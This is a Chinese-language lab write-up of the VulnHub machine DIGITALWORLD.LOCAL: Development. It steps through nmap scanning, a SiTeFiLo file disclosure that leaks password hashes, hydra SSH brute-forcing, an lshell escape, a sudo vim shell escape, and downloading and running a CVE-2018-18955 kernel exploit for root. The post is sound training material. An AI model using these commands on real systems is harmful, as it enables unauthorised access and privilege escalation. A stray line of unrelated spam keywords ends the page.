<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub綜合靶場:DIGITALWORLD.LOCAL發展

    VSole2021-10-29 13:47:20

    一、知識點和漏洞

    1. 知識點

    1) Namp收集信息

    2) 簡單文本文件登錄腳本 (SiTeFiLo) 1.0.6 - 文件泄露/遠程文件包含

    3) 空間越權(CVE-2018-18955)

    4) hydra爆破

    5) Vim提權

    2.漏洞

    1) CVE-2008-5763/2008-5762

    2) CVE-2018-18955

    二、基本環境和工具

    環境:

    1)目標靶機:ubuntu(官網下載靶機環境)

    2)百香果沙盤(Docker版)20210413

    工具:

    1)Kali:kali_201802版本

    2)nmap:kali內置

    3)Hydra:v8.6

    4)空間越權腳本:exploit.ldpreload.sh

    5)漏洞檢測腳本:les.sh

    1.靶機環境:

    1)靶場下載。

    DIGITALWORLD.LOCAL:發展靶場下載地址:

    https://www.vulnhub.com/entry/digitalworldlocal-development,280/

    2)靶場安裝。下載完后文件為devt-improved.7z。

    解壓文件到相應目錄。

    雙擊第二個文件后進行導入虛擬機。

    3)虛擬機設置。根據個人的電腦配置適當設置內存和處理器以及網絡。

    4)環境配置。

    開啟虛擬機,選擇linux恢復模式。

    ?????????????????????????????????????系統啟動完畢,??????????我們選擇root一行回車,然后再次回車進入命令行模式。

    查看是否自動獲取到ip。

    dhcp下發獲取ip。

    通過訪問Fw2管理地址:http://1.1.1.12,賬號密碼:root/goktech也可以查看:

    通過上圖我們知道了靶機的IP地址為10.10.19.50,接著我們就可以來配置端口映射,點擊網絡-防火墻-端口轉發-新增:


    配置kali的ip:

    ifconfig eth0 66.28.6.10 netmask 255.255.255.0

    route add default gw 66.28.6.1

    5)安裝完成,使用kali進行網址掃描,nmap -sP 66.28.5.0/24,再次確定映射后的靶機IP為66.28.5.2這邊需要根據個人的虛擬機網絡適配器的網址掃描。

    至此,完成靶機的安裝。成功訪問靶機頁面。http://66.28.5.2:8080/

    2. 操作機環境: 

    1)操作系統環境:kali linux 2018.2

    2)工具環境:能夠運行sh文件

    ● EXP/利用工具

    1.工具名稱:nmap

    工具安裝:kali內置

    使用說明:運行對應命令

    nmap -sS -sV -sC -O -T5 -Pn -p- ip

    注:服務版本識別(-sV);

    操作系統識別(-O);

    腳本掃描(-sC);

    Traceroute(–traceroute)

    -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式來對目標主機掃描。

    2.工具名稱:hydra

    工具安裝:kali內置

    使用說明:運行對應命令

    hydra -L user.txt -P pass.txt ssh://ip

    注:

    -L file 大寫,指定用戶的用戶名字典

    -p pass 小寫,用于指定密碼破解,很少使用,一般采用密碼字典。

    3.工具名稱:空間越權腳本

    工具安裝:git clone https://github.com/bcoles/kernel-exploits.git

    使用說明:運行對應命令

    cd kernel-exploits/CVE-2018-18955

    ./exploit.ldpreload.sh

    下載地址:(官網/git/百度云/其他)

    https://github.com/bcoles/kernel-exploits.git

    4.工具名稱:漏洞檢測腳本

    工具安裝:

    wget:

    https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

    使用說明:運行對應命令

    chmod +x les.sh

    ./les.sh

    三、靶場演練過程

    1.整體思路

    1)信息收集

    2)漏洞發現

    3)利用漏洞(Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion)

    4)Vim提權

    5)利用CVE-2018-18955提權

    2.漏洞利用步驟:

    步驟1:信息收集(IP和開放端口信息)

    1.打開虛擬機,顯示登錄界面,未提示密碼相關信息。

    2.查詢存活主機:nmap -sP 66.28.5.0/24,確定攻擊ip為66.28.5.2

    3.nmap掃描端口22 113 139 445 8080 (nmap -sV 66.28.5.2 -p 22,8080,113,139,445)

    得到靶機的22,8080,113,139,445都是開放狀態。

    步驟2:漏洞發現

    1.訪問66.28.5.2:8080

    根據:There are many projects in this box. View some of these projects at html_pages.

    告訴我們去訪問 html_pages目錄。

    2.接著訪問http://66.28.5.2:8080/html_pages

    發現敏感類信息development.html(猜測是否與靶機development有關)

    訪問http://66.28.5.2:8080/development.html。

    訪問http://66.28.5.2:8080/development.html并未發現什么信息,嘗試查看網頁源碼看看能獲取到什么

    查看網頁源碼中得到一條提示:

    <!-- You tried harder! Visit ./developmentsecretpage. -->

    那我們就繼續訪問上一級的developmentsecretpage目錄。

    3.根據上述提示進入http://66.28.5.2:8080/developmentsecretpage/

    嘗試點擊可訪問的頁面。

    出現Click here to log out.繼續訪問。

    點擊后出現一個登陸界面。

    嘗試弱密碼或萬能密碼登錄。

    登陸之后出現以下報錯信息:

    Deprecated: Function ereg_replace() is deprecated in /var/www/html/developmentsecretpage/slogin_lib.inc.php on line 335

    Deprecated: Function ereg_replace() is deprecated in /var/www/html/developmentsecretpage/slogin_lib.inc.php on line 336

    使用谷歌搜索一下slogin_lib.inc.php:

    點擊第一個鏈接進入漏洞數據庫即存在漏洞:

    Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion

    步驟3:利用漏洞

    1.進入漏洞數據庫:https://www.exploit-db.com/exploits/7444

    查看攻擊方式并選擇一個簡單地攻擊方式:[!] EXPLOIT: /[path]/slog_users.txt

    2.訪問

    http://66.28.5.2:8080/developmentsecretpage/slog_users.txt

    得到用戶名和MD5加密后密碼。

    復制出來進行解密。

    解密前:

    admin, 3cb1d13bb83ffff2defe8d1443d3a0eb

    intern, 4a8a2b374f463b7aedbb44a066363b81

    patrick, 87e6d56ce79af90dbe07d387d3d0579e

    qiu, ee64497098d0926d198f54f6d5431f98

    md5解密后得到:

    admin:未成功解密

    patrick:P@ssw0rd25

    qiu:qiu

    intern:12345678900987654321

    將用戶名和密碼分別保存為user.txt pass.txt

    3.使用hydra進行ssh連接測試

    hydra -L user.txt -P pass.txt ssh://66.28.5.2

    得到login: intern  password: 12345678900987654321

    可以ssh到靶機。

    步驟4:VIM提權

    1.登錄

    使用login: intern password: 12345678900987654321登錄靶機:66.28.5.2

    2.輸入id報錯,直接斷開連接(出現lshell 即limited shell)。

    3.嘗試使用返回交互式shell脫離lshell

    echo os.system('/bin/bash')


    恢復正常后進行查看版本信息:

    sudo-l 列出目前用戶可執行與無法執行的指令 發現用戶intern不能免密查看。

    查看/etc/passwd查看是否還有其他用戶。


    4.發現可切換用戶patrick

    切換用戶patrick

    login:patrick  password:P@ssw0rd25

    并查看用戶patrick的可執行與無法執行的指令。

    5.Vim提權

    1)直接提權:sudo vim -c ':!/bin/sh'

    步驟5:利用CVE-2018-18955提權

    1.根據版本ubuntu18.04使用漏洞檢測腳本les.sh檢測是否有漏洞

    les.sh 通過kali上傳(scp root@66.28.6.10:/root/les.sh ./)

    執行命令

     chmod +x les.sh

     ./les.sh


    發現存在漏洞CVE-2018-18955。

    \

    2.嘗試使用CVE-2018-18955提權

    下載好所需的文件(切回intern用戶的/tmp 目錄底下)

    有網絡直接git clone https://github.com/bcoles/kernel-exploits.git

    無網絡是通過kali傳輸。

    scp -r root@66.28.6.10:/root/kernel-exploits/* /tmp

    3.切換到相應路徑利用腳本進行提權:

    cd kernel-exploits/CVE-2018-18955

    ./exploit.ldpreload.sh

    4.測試:提權成功。

    四、過程問題記錄

    剛開始使用nmap掃描時未發現靶機ip,后面進入linux恢復模式進行dhcp釋放,重新獲取到ip。我做的時候當輸入密碼錯誤大于3次時,ip會沒辦法ping通需要重啟后才可繼續!

    五、收獲和總結

    第一次做這個綜合靶場還是有一定的難度的,需要一定的耐心去磨合。也要自身的基礎去不斷測試,可能不留意的一個頁面就是我們想要的信息。多去鍛煉一下自己對敏感信息的判斷才能更快的獲取到提示。一些命令還是需要多敲多背!

    六、參考資料

    簡單文本文件登錄腳本 (SiTeFiLo) 1.0.6 - 文件泄露/遠程文件包含:

    1.https://www.exploit-db.com/exploits/7444

    2.CVE-2018-18955漏洞學習:

    https://www.cnblogs.com/likaiming/p/10816529.html

    https://blog.csdn.net/bme314/article/details/105631793

    3.百香果沙盤使用參考:

    “百香果”內網安全沙盤2.0bate版使用指南-基礎篇:

    https://mp.weixin.qq.com/s/o6k3yNXlnQ3FwCciBUmrLw

    “百香果”內網安全沙盤2.0bate版使用指南-進階篇:

    https://mp.weixin.qq.com/s/nfa2DHkDPE43cIvvRmk1TA

    “百香果”內網安全沙盤2.0bate版使用指南-高級篇:

    https://mp.weixin.qq.com/s/MfWuBm_H7JxAvBKfnTpLZQ

    漏洞nmap
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Nmap 經常使用的場景及用法。
    ?Cobalt Strike基礎使用
    2021-10-28 08:48:39
    Cobalt Strike分為客戶端組件和服務器組件,服務器的組件也是團隊服務器,可以放在局域網或者公網下進行團隊使用,也是Cobalt Strike社會工程功能的托管機器,團隊服務器還可以存儲由Cobalt Strike收集的數據,并且進行日志管理。其支持多主機連接,部署好Beacon后提交一個要連回的域名或主機的列表,Beacon將通過這些主機輪詢。
    這篇文章主要收集一些常見的未授權訪問漏洞。未授權訪問漏洞可以理解為需要安全配置或權限認證的地址、授權頁面存在缺陷導致其他用戶可以直接訪問從而引發重要權限可被操作、數據庫或網站目錄等敏感信息泄露。
    cmd=id輸出了id為什么不直接在插件里面寫入反彈shell呢?因為不知道有沒有可以利用的工具來進行反彈shell,不清楚是否有nc,python,bash等等,那么寫入可以執行系統命令的代碼,可以去查找是否存在這些工具。發現為root用戶system /bin/bash提升為root權限拿到flag
    siusiu (suitesuite) 一個用來管理 suite 的 suite,志在將滲透測試工程師從各種安全工具的學習和使用中解脫出來,減少滲透測試工程師花在安裝工具、記憶工具使用方法上的時間和精力。
    內網滲透流程 一、內網信息收集 二、內網滲透方法 內網入侵是在攻擊者獲取目標webshell之后的一個后滲透的過程。 內網滲透流程 內網滲透大致可以分為兩部分一部分是內網信息收集,另一部分為內網入侵方法。 一、內網信息收集
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类